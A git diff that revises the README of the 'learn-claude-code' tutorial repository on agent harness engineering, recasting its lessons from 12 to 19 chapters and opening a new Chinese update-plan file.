-- **2019 -- OpenAI Five conquers Dota 2.** Five neural networks, having played [45,000 years of Dota 2](https://openai.com/index/openai-five-defeats-dota-2-world-champions/) against themselves in 10 months, defeated **OG** -- the reigning TI8 world champions -- 2-0 on a San Francisco livestream. In a subsequent public arena, the AI won 99.4% of 42,729 games against all comers. No scripted strategies. No meta-programmed team coordination. The models learned teamwork, tactics, and real-time adaptation entirely through self-play.
+- **2019 -- OpenAI Five conquers Dota 2.** Five neural networks played [45,000 years of Dota 2 against themselves](https://openai.com/index/openai-five-defeats-dota-2-world-champions/) over 10 months, then defeated **OG** -- the TI8 world champions -- 2-0 in a live match. 
In the public arena, the AI won 99.4% of 42,729 games. No scripted strategies. Models learned teamwork through self-play.

-- **2019 -- DeepMind AlphaStar masters StarCraft II.** AlphaStar [beat professional players 10-1](https://deepmind.google/blog/alphastar-mastering-the-real-time-strategy-game-starcraft-ii/) in a closed-door match, and later achieved [Grandmaster status](https://www.nature.com/articles/d41586-019-03298-6) on European servers -- top 0.15% of 90,000 players. A game with imperfect information, real-time decisions, and a combinatorial action space that dwarfs chess and Go. The agent? A model. Trained. Not scripted.
+- **2019 -- DeepMind AlphaStar masters StarCraft II.** AlphaStar [beat professional players 10-1](https://deepmind.google/blog/alphastar-mastering-the-real-time-strategy-game-starcraft-ii/) in closed matches, then reached [Grandmaster rank](https://www.nature.com/articles/d41586-019-03298-6) on the European server -- top 0.15% of 90,000 players. An incomplete-information, real-time game with a combinatorial action space far exceeding chess or Go.

-- **2019 -- Tencent Jueyu dominates Honor of Kings.** Tencent AI Lab's "Jueyu" [defeated KPL professional players](https://www.jiemian.com/article/3371171.html) in a full 5v5 match at the World Champion Cup. In 1v1 mode, pros won only [1 out of 15 games and never survived past 8 minutes](https://developer.aliyun.com/article/851058). Training intensity: one day equaled 440 human years. By 2021, Jueyu surpassed KPL pros across the full hero pool. No handcrafted matchup tables. No scripted compositions. A model that learned the entire game from scratch through self-play.
+- **2019 -- Tencent Jueyu dominates Honor of Kings.** Tencent AI Lab's "Jueyu" system [defeated KPL professional players in full 5v5](https://www.jiemian.com/article/3371171.html) at the World Champion Cup semifinal. 
In 1v1 mode, pros [won just 1 out of 15 matches, never surviving past 8 minutes](https://developer.aliyun.com/article/851058). Training intensity: one day equaled 440 human years. A model that learned the entire game from scratch through self-play.

-- **2024-2025 -- LLM agents reshape software engineering.** Claude, GPT, Gemini -- large language models trained on the entirety of human code and reasoning -- are deployed as coding agents. They read codebases, write implementations, debug failures, coordinate in teams. The architecture is identical to every agent before them: a trained model, placed in an environment, given tools to perceive and act. The only difference is the scale of what they've learned and the generality of the tasks they solve.
+- **2024-2025 -- LLM agents reshape software engineering.** Claude, GPT, Gemini -- large language models trained on the full breadth of human code and reasoning -- are deployed as coding agents. They read codebases, write implementations, debug failures, and coordinate as teams. The architecture is identical to every previous agent: a trained model, placed in an environment, given tools for perception and action.

-Every one of these milestones points to the same fact: **agency -- the ability to perceive, reason, and act -- is trained, not coded.** But every agent also needed an environment to operate in: the Atari emulator, the Dota 2 client, the StarCraft II engine, the IDE and terminal. The model provides intelligence. The environment provides the action space. Together they form a complete agent.
+Every milestone points to the same fact: **Agency -- the ability to perceive, reason, and act -- is trained, not coded.** But every agent also needs an environment to operate in: an Atari emulator, the Dota 2 client, the StarCraft II engine, an IDE and a terminal. The model supplies the intelligence. The environment supplies the action space. Together they form a complete agent. 
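Every one of these systems reduces to the same two-piece shape: a trained model making decisions inside an environment that executes them. A minimal sketch of that shape -- purely illustrative, with invented names (`ToyModel`, `ToyEnv`, `run_agent`), not code from any of these projects:

```python
# Illustrative sketch: a complete agent = trained model + environment.
# The model decides; the environment executes and reports back.
class ToyEnv:
    """Stand-in environment: holds state, executes actions, returns observations."""
    def reset(self):
        return 0              # initial observation

    def step(self, action):
        return action         # new observation after acting

class ToyModel:
    """Stand-in for a trained model: maps observation -> action."""
    def decide(self, observation):
        return None if observation >= 3 else observation + 1  # None = stop

def run_agent(model, env, max_steps=10):
    observation = env.reset()
    for _ in range(max_steps):
        action = model.decide(observation)   # intelligence: trained, not coded
        if action is None:                   # the model decides when to stop
            break
        observation = env.step(action)       # harness: executes and observes
    return observation
```

Swap `ToyEnv` for an Atari emulator, a Dota client, or a terminal, and `ToyModel` for a trained network: the loop stays the same, because nothing domain-specific lives in it.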
### What an Agent Is NOT -The word "agent" has been hijacked by an entire cottage industry of prompt plumbing. - -Drag-and-drop workflow builders. No-code "AI agent" platforms. Prompt-chain orchestration libraries. They all share the same delusion: that wiring together LLM API calls with if-else branches, node graphs, and hardcoded routing logic constitutes "building an agent." +The word "agent" has been hijacked by an entire prompt-plumbing industry. -It doesn't. What they build is a Rube Goldberg machine -- an over-engineered, brittle pipeline of procedural rules, with an LLM wedged in as a glorified text-completion node. That is not an agent. That is a shell script with delusions of grandeur. +Drag-and-drop workflow builders. No-code "AI Agent" platforms. Prompt-chain orchestration libraries. They share a single delusion: that stringing LLM API calls together with if-else branches, node graphs, and hardcoded routing logic constitutes "building an agent." -**Prompt plumbing "agents" are the fantasy of programmers who don't train models.** They attempt to brute-force intelligence by stacking procedural logic -- massive rule trees, node graphs, chain-of-prompt waterfalls -- and praying that enough glue code will somehow emergently produce autonomous behavior. It won't. You cannot engineer your way to agency. Agency is learned, not programmed. +It does not. What they produce are Rube Goldberg machines -- over-engineered, brittle, procedural rule pipelines with an LLM wedged in as a glorified text-completion node. That is not an agent. That is a shell script with grandiose pretensions. -Those systems are dead on arrival: fragile, unscalable, fundamentally incapable of generalization. They are the modern resurrection of GOFAI (Good Old-Fashioned AI) -- the symbolic rule systems the field abandoned decades ago, now spray-painted with an LLM veneer. Different packaging, same dead end. 
+You cannot brute-force intelligence by stacking procedural logic -- sprawling rule trees, node graphs, chained prompt waterfalls -- and praying that enough glue code will spontaneously produce autonomous behavior. It will not. You cannot engineer agency into existence. Agency is learned, not coded. -### The Mind Shift: From "Developing Agents" to Developing Harness +### The Mindshift: From "Building Agents" to Building Harnesses -When someone says "I'm developing an agent," they can only mean one of two things: +When someone says "I am building an agent," they can only mean one of two things: -**1. Training the model.** Adjusting weights through reinforcement learning, fine-tuning, RLHF, or other gradient-based methods. Collecting task-process data -- the actual sequences of perception, reasoning, and action in real domains -- and using it to shape the model's behavior. This is what DeepMind, OpenAI, Tencent AI Lab, and Anthropic do. This is agent development in the truest sense. +**1. Training a model.** Adjusting weights through reinforcement learning, fine-tuning, RLHF, or another gradient-based method. Collecting trajectory data -- real-world sequences of perception, reasoning, and action in a target domain -- and using it to shape the model's behavior. This is what DeepMind, OpenAI, Tencent AI Lab, and Anthropic do. -**2. Building the harness.** Writing the code that gives the model an environment to operate in. This is what most of us do, and it is the focus of this repository. +**2. Building a harness.** Writing the code that gives a model an operational environment. This is what most of us do, and it is the core of this repository. 
-A harness is everything the agent needs to function in a specific domain: +A harness is everything an agent needs to work in a specific domain: ``` Harness = Tools + Knowledge + Observation + Action Interfaces + Permissions @@ -56,83 +55,55 @@ Harness = Tools + Knowledge + Observation + Action Interfaces + Permissions Knowledge: product docs, domain references, API specs, style guides Observation: git diff, error logs, browser state, sensor data Action: CLI commands, API calls, UI interactions - Permissions: sandboxing, approval workflows, trust boundaries + Permissions: sandbox isolation, approval workflows, trust boundaries ``` The model decides. The harness executes. The model reasons. The harness provides context. The model is the driver. The harness is the vehicle. -**A coding agent's harness is its IDE, terminal, and filesystem access.** A farm agent's harness is its sensor array, irrigation controls, and weather data feeds. A hotel agent's harness is its booking system, guest communication channels, and facility management APIs. The agent -- the intelligence, the decision-maker -- is always the model. The harness changes per domain. The agent generalizes across them. - -This repo teaches you to build vehicles. Vehicles for coding. But the design patterns generalize to any domain: farm management, hotel operations, manufacturing, logistics, healthcare, education, scientific research. Anywhere a task needs to be perceived, reasoned about, and acted upon -- an agent needs a harness. +This repository teaches you to build the vehicle. A vehicle for coding. But the design patterns generalize to any domain. ### What Harness Engineers Actually Do -If you are reading this repository, you are likely a harness engineer -- and that is a powerful thing to be. Here is your real job: +If you are reading this repository, you are most likely a harness engineer. Here is what the job actually entails: -- **Implement tools.** Give the agent hands. 
File read/write, shell execution, API calls, browser control, database queries. Each tool is an action the agent can take in its environment. Design them to be atomic, composable, and well-described.
+- **Implement tools.** Give the agent hands. File read/write, shell execution, API calls, browser control, database queries. Each tool is one action the agent can take in its environment. Design them to be atomic, composable, and clearly described.

-- **Curate knowledge.** Give the agent domain expertise. Product documentation, architectural decision records, style guides, regulatory requirements. Load them on-demand (s05), not upfront. The agent should know what's available and pull what it needs.
+- **Curate knowledge.** Give the agent domain expertise. Product documentation, architecture decision records, style guides, compliance requirements. Load on demand, not upfront.

-- **Manage context.** Give the agent clean memory. Subagent isolation (s04) prevents noise from leaking. Context compression (s06) prevents history from overwhelming. Task systems (s07) persist goals beyond any single conversation.
+- **Manage context.** Give the agent clean memory. Subagent isolation prevents noise leakage. Context compaction prevents history from drowning the present. Task systems let goals persist beyond a single conversation.

-- **Control permissions.** Give the agent boundaries. Sandbox file access. Require approval for destructive operations. Enforce trust boundaries between the agent and external systems. This is where safety engineering meets harness engineering.
+- **Control permissions.** Give the agent boundaries. Sandbox file access. Require approval for destructive operations. Enforce trust boundaries between the agent and external systems.

-- **Collect task-process data.** Every action sequence the agent executes in your harness is training signal. 
The perception-reasoning-action traces from real deployments are the raw material for fine-tuning the next generation of agent models. Your harness doesn't just serve the agent -- it can help improve the agent. +- **Collect trajectory data.** Every action sequence the agent executes in your harness is training signal. Real deployment trajectories are the raw material for fine-tuning the next generation of agent models. -You are not writing the intelligence. You are building the world the intelligence inhabits. The quality of that world -- how clearly the agent can perceive, how precisely it can act, how rich its available knowledge is -- directly determines how effectively the intelligence can express itself. +You are not writing intelligence. You are building the world that intelligence inhabits. The quality of that world directly determines how effectively the intelligence can express itself. -**Build great harnesses. The agent will do the rest.** +**Build the harness well. The model will do the rest.** -### Why Claude Code -- A Masterclass in Harness Engineering +### Why Claude Code -Why does this repository dissect Claude Code specifically? +Because Claude Code is the most elegant, most complete agent harness implementation we have seen. Not because of any clever trick, but because of what it *does not* do: it does not try to be the agent. It does not impose rigid workflows. It does not substitute hand-crafted decision trees for the model's own judgment. It gives the model tools, knowledge, context management, and permission boundaries -- then gets out of the way. -Because Claude Code is the most elegant and fully-realized agent harness we have seen. Not because of any single clever trick, but because of what it *doesn't* do: it doesn't try to be the agent. It doesn't impose rigid workflows. It doesn't second-guess the model with elaborate decision trees. 
It provides the model with tools, knowledge, context management, and permission boundaries -- then gets out of the way. - -Look at what Claude Code actually is, stripped to its essence: +Strip Claude Code down to its essence: ``` Claude Code = one agent loop + tools (bash, read, write, edit, glob, grep, browser...) + on-demand skill loading - + context compression + + context compaction + subagent spawning - + task system with dependency graph - + team coordination with async mailboxes - + worktree isolation for parallel execution + + task system with dependency graphs + + async mailbox team coordination + + worktree-isolated parallel execution + permission governance + + hooks extension system + + memory persistence + + MCP external capability routing ``` -That's it. That's the entire architecture. Every component is a harness mechanism -- a piece of the world built for the agent to inhabit. The agent itself? It's Claude. A model. Trained by Anthropic on the full breadth of human reasoning and code. The harness doesn't make Claude smart. Claude is already smart. The harness gives Claude hands, eyes, and a workspace. - -This is why Claude Code is the ideal teaching subject: **it demonstrates what happens when you trust the model and focus your engineering on the harness.** Every session in this repository (s01-s12) reverse-engineers one harness mechanism from Claude Code's architecture. By the end, you understand not just how Claude Code works, but the universal principles of harness engineering that apply to any agent in any domain. - -The lesson is not "copy Claude Code." The lesson is: **the best agent products are built by engineers who understand that their job is harness, not intelligence.** - ---- - -## The Vision: Fill the Universe with Real Agents - -This is not just about coding agents. - -Every domain where humans perform complex, multi-step, judgment-intensive work is a domain where agents can operate -- given the right harness. 
The patterns in this repository are universal: - -``` -Estate management agent = model + property sensors + maintenance tools + tenant comms -Agricultural agent = model + soil/weather data + irrigation controls + crop knowledge -Hotel operations agent = model + booking system + guest channels + facility APIs -Medical research agent = model + literature search + lab instruments + protocol docs -Manufacturing agent = model + production line sensors + quality controls + logistics -Education agent = model + curriculum knowledge + student progress + assessment tools -``` - -The loop is always the same. The tools change. The knowledge changes. The permissions change. The agent -- the model -- generalizes. - -Every harness engineer reading this repository is learning patterns that apply far beyond software engineering. You are learning to build the infrastructure for an intelligent, automated future. Every well-designed harness deployed in a real domain is one more place where an agent can perceive, reason, and act. +That is it. The agent itself? Claude. A model. Trained by Anthropic on the full breadth of human reasoning and code. The harness did not make Claude smart. Claude was already smart. The harness gave Claude hands, eyes, and a workspace. -First we fill the workshops. Then the farms, the hospitals, the factories. Then the cities. Then the planet. - -**Bash is all you need. Real agents are all the universe needs.** +The takeaway is not "copy Claude Code." The takeaway is: **the best agent products come from engineers who understand that their job is the harness, not the intelligence.** --- @@ -151,43 +122,13 @@ First we fill the workshops. Then the farms, the hospitals, the factories. Then loop back -----------------> messages[] - That's the minimal loop. Every AI agent needs this loop. - The MODEL decides when to call tools and when to stop. - The CODE just executes what the model asks for. 
- This repo teaches you to build what surrounds this loop -- + The model decides when to call tools and when to stop. + The code just executes what the model asks for. + This repo teaches you to build everything around this loop -- the harness that makes the agent effective in a specific domain. ``` -**12 progressive sessions, from a simple loop to isolated autonomous execution.** -**Each session adds one harness mechanism. Each mechanism has one motto.** - -> **s01**   *"One loop & Bash is all you need"* — one tool + one loop = an agent -> -> **s02**   *"Adding a tool means adding one handler"* — the loop stays the same; new tools register into the dispatch map -> -> **s03**   *"An agent without a plan drifts"* — list the steps first, then execute; completion doubles -> -> **s04**   *"Break big tasks down; each subtask gets a clean context"* — subagents use independent messages[], keeping the main conversation clean -> -> **s05**   *"Load knowledge when you need it, not upfront"* — inject via tool_result, not the system prompt -> -> **s06**   *"Context will fill up; you need a way to make room"* — three-layer compression strategy for infinite sessions -> -> **s07**   *"Break big goals into small tasks, order them, persist to disk"* — a file-based task graph with dependencies, laying the foundation for multi-agent collaboration -> -> **s08**   *"Run slow operations in the background; the agent keeps thinking"* — daemon threads run commands, inject notifications on completion -> -> **s09**   *"When the task is too big for one, delegate to teammates"* — persistent teammates + async mailboxes -> -> **s10**   *"Teammates need shared communication rules"* — one request-response pattern drives all negotiation -> -> **s11**   *"Teammates scan the board and claim tasks themselves"* — no need for the lead to assign each one -> -> **s12**   *"Each works in its own directory, no interference"* — tasks manage goals, worktrees manage directories, bound by ID - ---- - -## The 
Core Pattern +## Core Pattern ```python def agent_loop(messages): @@ -214,140 +155,182 @@ def agent_loop(messages): messages.append({"role": "user", "content": results}) ``` -Every session layers one harness mechanism on top of this loop -- without changing the loop itself. The loop belongs to the agent. The mechanisms belong to the harness. +Every lesson layers one harness mechanism on top of this loop -- the loop itself never changes. The loop belongs to the agent. The mechanisms belong to the harness. -## Scope (Important) +--- -This repository is a 0->1 learning project for harness engineering -- building the environment that surrounds an agent model. -It intentionally simplifies or omits several production mechanisms: +## 19 Progressive Lessons -- Full event/hook buses (for example PreToolUse, SessionStart/End, ConfigChange). - s12 includes only a minimal append-only lifecycle event stream for teaching. -- Rule-based permission governance and trust workflows -- Session lifecycle controls (resume/fork) and advanced worktree lifecycle controls -- Full MCP runtime details (transport/OAuth/resource subscribe/polling) +**Each lesson adds one harness mechanism. Each mechanism has a motto.** -Treat the team JSONL mailbox protocol in this repo as a teaching implementation, not a claim about any specific production internals. 
+> **s01**   *"One loop & Bash is all you need"* — one tool + one loop = one agent +> +> **s02**   *"Adding a tool means adding one handler"* — the loop stays untouched; new tools register into the dispatch map +> +> **s03**   *"Set boundaries first, then grant freedom"* — the permission pipeline decides which operations need approval +> +> **s04**   *"Hook around the loop, never rewrite the loop"* — hooks inject extension logic before and after tool execution +> +> **s05**   *"An agent without a plan drifts"* — list the steps before starting; completion rate doubles +> +> **s06**   *"Big tasks split small, each subtask gets clean context"* — subagents use a fresh messages[], keeping the main conversation clean +> +> **s07**   *"Load knowledge on demand, not upfront"* — inject via tool_result, not the system prompt +> +> **s08**   *"Context always fills up -- have a way to make room"* — multi-layer compaction strategies buy you infinite sessions +> +> **s09**   *"Remember what matters, forget what doesn't"* — three subsystems: selection, extraction, consolidation +> +> **s10**   *"Prompts are assembled at runtime, not hardcoded"* — section-based concatenation, loaded on demand +> +> **s11**   *"Errors aren't the end, they're the start of a retry"* — escalate tokens, compact context, switch models +> +> **s12**   *"Big goals break into small tasks, ordered, persisted to disk"* — a file-backed task graph that lays the groundwork for multi-agent coordination +> +> **s13**   *"Slow ops go background, agent keeps thinking"* — background threads run commands; notifications inject on completion +> +> **s14**   *"Fire on schedule, no human kick needed"* — cron scheduling, durable or session-scoped +> +> **s15**   *"Too big for one agent -- delegate to teammates"* — persistent teammates + async mailboxes +> +> **s16**   *"Teammates need shared communication rules"* — one request-response pattern drives all negotiation +> +> **s17**   *"Teammates check the board, claim work 
themselves"* — no leader assigning one by one; self-organizing +> +> **s18**   *"Each works in its own directory, no interference"* — tasks own goals, worktrees own directories, bound by ID +> +> **s19**   *"Not enough capability? Plug in more via MCP"* — multi-transport, channel routing, tool pool merging -## Quick Start +--- -```sh -git clone https://github.com/shareAI-lab/learn-claude-code -cd learn-claude-code -pip install -r requirements.txt -cp .env.example .env # Edit .env with your ANTHROPIC_API_KEY +## Five Stages -python agents/s01_agent_loop.py # Start here -python agents/s12_worktree_task_isolation.py # Full progression endpoint -python agents/s_full.py # Capstone: all mechanisms combined -``` +| Stage | Chapters | What you are building | +|---|---|---| +| **Tool pipeline** | `s01-s04` | loop → tool dispatch → permission pipeline → hook extensions | +| **Single-agent capability** | `s05-s08` | planning → subagent → skill loading → context compaction | +| **Knowledge and resilience** | `s09-s11` | memory → prompt assembly → error recovery | +| **Durable work** | `s12-s14` | task graph → background execution → scheduled triggers | +| **Multi-agent platform** | `s15-s19` | teams → protocols → autonomy → worktree isolation → MCP | -### Web Platform +--- -Interactive visualizations, step-through diagrams, source viewer, and documentation. 
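The first stage above (s01-s04: loop → dispatch → permission → hooks) can be collapsed into a single sketch. This is a hedged illustration, not the repository's implementation: `TOOL_HANDLERS` echoes the concept named in the chapters, while the decorator, the single permission rule, and the hook lists are invented for this example:

```python
# Hedged sketch of the s01-s04 tool pipeline: a dispatch map (s02),
# a permission check (s03), and pre/post hooks (s04) wrapped around execution.
TOOL_HANDLERS = {}               # tool name -> handler: one tool, one handler
PRE_HOOKS, POST_HOOKS = [], []   # extension points around the call, not in the loop

def register_tool(name):
    """Adding a tool means adding one handler -- the loop never changes."""
    def decorator(fn):
        TOOL_HANDLERS[name] = fn
        return fn
    return decorator

def check_permission(name, args):
    """Toy rule: deny one obviously destructive bash command, allow the rest."""
    if name == "bash" and "rm -rf /" in args.get("command", ""):
        return "deny"
    return "allow"

def dispatch(name, args):
    if check_permission(name, args) != "allow":
        return "Error: permission denied"
    for hook in PRE_HOOKS:
        hook(name, args)              # PreToolUse-style hook
    result = TOOL_HANDLERS[name](**args)
    for hook in POST_HOOKS:
        hook(name, args, result)      # PostToolUse-style hook
    return result

@register_tool("echo")
def echo(text):
    return text
```

Adding a tool touches only the dispatch map; permission rules and hooks wrap around the call from the outside, which is why the loop that invokes `dispatch` can stay untouched from s01 onward.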
+## All Chapters + +| Chapter | Topic | Key Concepts | +|---|---|---| +| [s01](./s01_agent_loop/) | Agent Loop | `messages` / `while True` / `stop_reason` | +| [s02](./s02_tool_use/) | Tool Use | `TOOL_HANDLERS` / dispatch map / concurrency | +| [s03](./s03_permission/) | Permission System | `PermissionRule` / approval pipeline | +| [s04](./s04_hooks/) | Hook System | `PreToolUse` / `PostToolUse` / extension points | +| [s05](./s05_todo_write/) | TodoWrite | `TodoItem` / plan-then-execute | +| [s06](./s06_subagent/) | Subagent | `fresh messages[]` / context isolation | +| [s07](./s07_skill_loading/) | Skill Loading | `SkillManifest` / on-demand injection | +| [s08](./s08_context_compact/) | Context Compact | snipCompact / microCompact / toolResultBudget / autoCompact | +| [s09](./s09_memory/) | Memory System | selection / extraction / consolidation | +| [s10](./s10_system_prompt/) | System Prompt | runtime assembly / section concatenation | +| [s11](./s11_error_recovery/) | Error Recovery | token escalation / fallback model / retry strategies | +| [s12](./s12_task_system/) | Task System | `TaskRecord` / `blockedBy` / disk persistence | +| [s13](./s13_background_tasks/) | Background Tasks | threaded execution / notification queue | +| [s14](./s14_cron_scheduler/) | Cron Scheduler | durable scheduling / session-scoped triggers | +| [s15](./s15_agent_teams/) | Agent Teams | `MessageBus` / inbox / permission bubbling | +| [s16](./s16_team_protocols/) | Team Protocols | shutdown handshake / plan approval | +| [s17](./s17_autonomous_agents/) | Autonomous Agents | idle cycle / auto-claim / self-organization | +| [s18](./s18_worktree_isolation/) | Worktree Isolation | `WorktreeRecord` / task-directory binding | +| [s19](./s19_mcp_plugin/) | MCP Plugin | multi-transport / channel routing / tool pool merge | +| [s_full](./s_full/) | Capstone | all mechanisms from s01-s19 merged | -```sh -cd web && npm install && npm run dev # http://localhost:3000 -``` +--- + +## How to Read 
-## Learning Path +Each chapter is a folder. Open one and you will find: ``` -Phase 1: THE LOOP Phase 2: PLANNING & KNOWLEDGE -================== ============================== -s01 The Agent Loop [1] s03 TodoWrite [5] - while + stop_reason TodoManager + nag reminder - | | - +-> s02 Tool Use [4] s04 Subagents [5] - dispatch map: name->handler fresh messages[] per child - | - s05 Skills [5] - SKILL.md via tool_result - | - s06 Context Compact [5] - 3-layer compression - -Phase 3: PERSISTENCE Phase 4: TEAMS -================== ===================== -s07 Tasks [8] s09 Agent Teams [9] - file-based CRUD + deps graph teammates + JSONL mailboxes - | | -s08 Background Tasks [6] s10 Team Protocols [12] - daemon threads + notify queue shutdown + plan approval FSM - | - s11 Autonomous Agents [14] - idle cycle + auto-claim - | - s12 Worktree Isolation [16] - task coordination + optional isolated execution lanes - - [N] = number of tools +s08_context_compact/ + README.md # full narrative with inline code + README.en.md # English translation + README.ja.md # Japanese translation + code.py # standalone runnable implementation + images/ # SVG diagrams (where needed) ``` -## Architecture +Read the `README.md` for the core idea and work through the code. Complex chapters have `
` folds for deep dives -- open them when you want to go deeper. Simple chapters have 0-1 diagrams, complex chapters have more. +Read from s01 through s19 in order. Each chapter assumes you've read the previous ones and ends with a hook into the next. + +--- + +## Quick Start + +```sh +git clone https://github.com/shareAI-lab/learn-claude-code +cd learn-claude-code +pip install -r requirements.txt +cp .env.example .env # configure ANTHROPIC_API_KEY + +python s01_agent_loop/code.py # Start here -- one loop + bash +python s08_context_compact/code.py # Context compaction (complex) +python s_full/code.py # Capstone: all mechanisms ``` -learn-claude-code/ -| -|-- agents/ # Python reference implementations (s01-s12 + s_full capstone) -|-- docs/{en,zh,ja}/ # Mental-model-first documentation (3 languages) -|-- web/ # Interactive learning platform (Next.js) -|-- skills/ # Skill files for s05 -+-- .github/workflows/ci.yml # CI: typecheck + build -``` -## Documentation +--- + +## Project Structure -Mental-model-first: problem, solution, ASCII diagram, minimal code. -Available in [English](./docs/en/) | [中文](./docs/zh/) | [日本語](./docs/ja/). +``` +learn-claude-code/ + s01_agent_loop/ # one folder per chapter + README.md # Chinese source (complete narrative) + README.en.md # English translation + README.ja.md # Japanese translation + code.py # standalone runnable code + images/ # SVG diagrams + s02_tool_use/ + ... 
+ s19_mcp_plugin/ + s_full/ # capstone + agents/ # flat copies for quick python agents/sXX.py + skills/ # skill files used by s07 + docs/ # legacy online docs (archived) + web/ # web teaching platform + tests/ +``` -| Session | Topic | Motto | -|---------|-------|-------| -| [s01](./docs/en/s01-the-agent-loop.md) | The Agent Loop | *One loop & Bash is all you need* | -| [s02](./docs/en/s02-tool-use.md) | Tool Use | *Adding a tool means adding one handler* | -| [s03](./docs/en/s03-todo-write.md) | TodoWrite | *An agent without a plan drifts* | -| [s04](./docs/en/s04-subagent.md) | Subagents | *Break big tasks down; each subtask gets a clean context* | -| [s05](./docs/en/s05-skill-loading.md) | Skills | *Load knowledge when you need it, not upfront* | -| [s06](./docs/en/s06-context-compact.md) | Context Compact | *Context will fill up; you need a way to make room* | -| [s07](./docs/en/s07-task-system.md) | Tasks | *Break big goals into small tasks, order them, persist to disk* | -| [s08](./docs/en/s08-background-tasks.md) | Background Tasks | *Run slow operations in the background; the agent keeps thinking* | -| [s09](./docs/en/s09-agent-teams.md) | Agent Teams | *When the task is too big for one, delegate to teammates* | -| [s10](./docs/en/s10-team-protocols.md) | Team Protocols | *Teammates need shared communication rules* | -| [s11](./docs/en/s11-autonomous-agents.md) | Autonomous Agents | *Teammates scan the board and claim tasks themselves* | -| [s12](./docs/en/s12-worktree-task-isolation.md) | Worktree + Task Isolation | *Each works in its own directory, no interference* | +--- -## What's Next -- from understanding to shipping +## What's Next -After the 12 sessions you understand how harness engineering works inside out. Two ways to put that knowledge to work: +After 19 lessons, you understand harness engineering from the inside out. 
Two paths to turn that knowledge into product:

### Kode Agent CLI -- Open-Source Coding Agent CLI

-> `npm i -g @shareai-lab/kode`
+> `npm i -g @shareai-lab/kode`

-Skill & LSP support, Windows-ready, pluggable with GLM / MiniMax / DeepSeek and other open models. Install and go.
+Skill and LSP support, Windows compatible, works with GLM / MiniMax / DeepSeek and other open models. Install and go.

-GitHub: **[shareAI-lab/Kode-cli](https://github.com/shareAI-lab/Kode-cli)**
+GitHub: **[shareAI-lab/Kode-Agent](https://github.com/shareAI-lab/Kode-Agent)**

-### Kode Agent SDK -- Embed Agent Capabilities in Your App
+### Kode Agent SDK -- Embed Agent Capabilities in Your Application

-The official Claude Code Agent SDK communicates with a full CLI process under the hood -- each concurrent user means a separate terminal process. Kode SDK is a standalone library with no per-user process overhead, embeddable in backends, browser extensions, embedded devices, or any runtime.
+A standalone library with no per-user process overhead. Embed it in backends, browser extensions, embedded devices, or any runtime.

-GitHub: **[shareAI-lab/Kode-agent-sdk](https://github.com/shareAI-lab/Kode-agent-sdk)**
+GitHub: **[shareAI-lab/kode-agent-sdk](https://github.com/shareAI-lab/kode-agent-sdk)**

---

-## Sister Repo: from *on-demand sessions* to *always-on assistant*
+## Sister Tutorial: From Passive Sessions to Always-On Assistants

-The harness this repo teaches is **use-and-discard** -- open a terminal, give the agent a task, close when done, next session starts blank. That is the Claude Code model.
+The harness taught in this repository is the **use-and-discard** kind -- open a terminal, give the agent a task, close when done, next session starts fresh. Claude Code works this way. 
-[OpenClaw](https://github.com/openclaw/openclaw) proved another possibility: on top of the same agent core, two harness mechanisms turn the agent from "poke it to make it move" into "it wakes up every 30 seconds to look for work": +But [OpenClaw](https://github.com/openclaw/openclaw) proves another possibility: on the same agent core, two additional harness mechanisms turn an agent from "poke it and it moves" into "wakes itself every 30 seconds to look for work": -- **Heartbeat** -- every 30s the harness sends the agent a message to check if there is anything to do. Nothing? Go back to sleep. Something? Act immediately. -- **Cron** -- the agent can schedule its own future tasks, executed automatically when the time comes. +- **Heartbeat** -- every 30 seconds the harness sends the agent a message, letting it check for pending work. Nothing to do? Keep sleeping. Something appeared? Act immediately. +- **Cron** -- the agent can schedule its own future tasks, which fire automatically when the time arrives. -Add multi-channel IM routing (WhatsApp / Telegram / Slack / Discord, 13+ platforms), persistent context memory, and a Soul personality system, and the agent goes from a disposable tool to an always-on personal AI assistant. +Add IM multi-channel routing (WhatsApp / Telegram / Slack / Discord and 13+ other platforms), persistent context memory, and a Soul personality system, and the agent transforms from a disposable tool into an always-on personal AI assistant. 
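+The two heartbeat/cron bullets above can be caricatured in a dozen lines of Python. This is a toy sketch of the heartbeat contract, not OpenClaw's actual code — the class name and the `HEARTBEAT_OK` reply convention are assumptions for illustration:
+
+```python
+class HeartbeatHarness:
+    """Toy always-on harness: periodically nudge the agent to check for work."""
+
+    def __init__(self, agent, interval_seconds=30):
+        self.agent = agent                    # callable: prompt -> reply string
+        self.interval_seconds = interval_seconds
+
+    def run(self, ticks):
+        """Run `ticks` heartbeat cycles; return how many times the agent acted."""
+        acted = 0
+        for _ in range(ticks):
+            # A real harness would time.sleep(self.interval_seconds) here.
+            reply = self.agent("HEARTBEAT: anything pending?")
+            if reply.strip() != "HEARTBEAT_OK":
+                acted += 1  # the agent found pending work and handled it
+        return acted
+```
+
+Cron is the same shape, with a schedule check in place of the fixed interval.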
-**[claw0](https://github.com/shareAI-lab/claw0)** is our companion teaching repo that deconstructs these harness mechanisms from scratch: +**[claw0](https://github.com/shareAI-lab/claw0)** is our sister teaching repository, breaking down these harness mechanisms from scratch: ``` claw agent = agent core + heartbeat + cron + IM chat + memory + soul @@ -355,23 +338,19 @@ claw agent = agent core + heartbeat + cron + IM chat + memory + soul ``` learn-claude-code claw0 -(agent harness core: (proactive always-on harness: - loop, tools, planning, heartbeat, cron, IM channels, - teams, worktree isolation) memory, soul personality) +(agent harness internals: (always-on harness: + loop, tools, planning, heartbeat, cron, IM channels, + teams, worktree isolation) memory, Soul personality) ``` -## About -
- -Scan with WeChat to follow us, -or follow on X: [shareAI-Lab](https://x.com/baicai003) - ## License MIT --- -**Agency comes from the model. The harness makes agency real. Build great harnesses. The model will do the rest.** +**Agency comes from the model. The harness gives agency a place to land. Build the harness well, and the model will do the rest.** **Bash is all you need. Real agents are all the universe needs.** + +**This is not "copy the source code." This is "grasp the key designs and build it yourself."** diff --git a/UPDATE-PLAN.md b/UPDATE-PLAN.md new file mode 100644 index 000000000..7787d21d6 --- /dev/null +++ b/UPDATE-PLAN.md @@ -0,0 +1,339 @@ +# Session 更新计划 + +## 原则 + +- 每章开独立 Explore Agent 深入读 CC 源码,拿到具体的字段名、行号、常量值、算法逻辑 +- 源码分析写入 `
` 折叠,不污染教学主线 +- 深入但不堆砌——只保留对理解核心概念有帮助的差异点 +- 简单章(概念足够直观)分析可以轻量,复杂章(机制密集)必须全量 + +## 更新完成标准 + +每章更新后应满足: +- [ ] README 主线无 CC 内部工程术语(tengu_*、GrowthBook 等) +- [ ] `
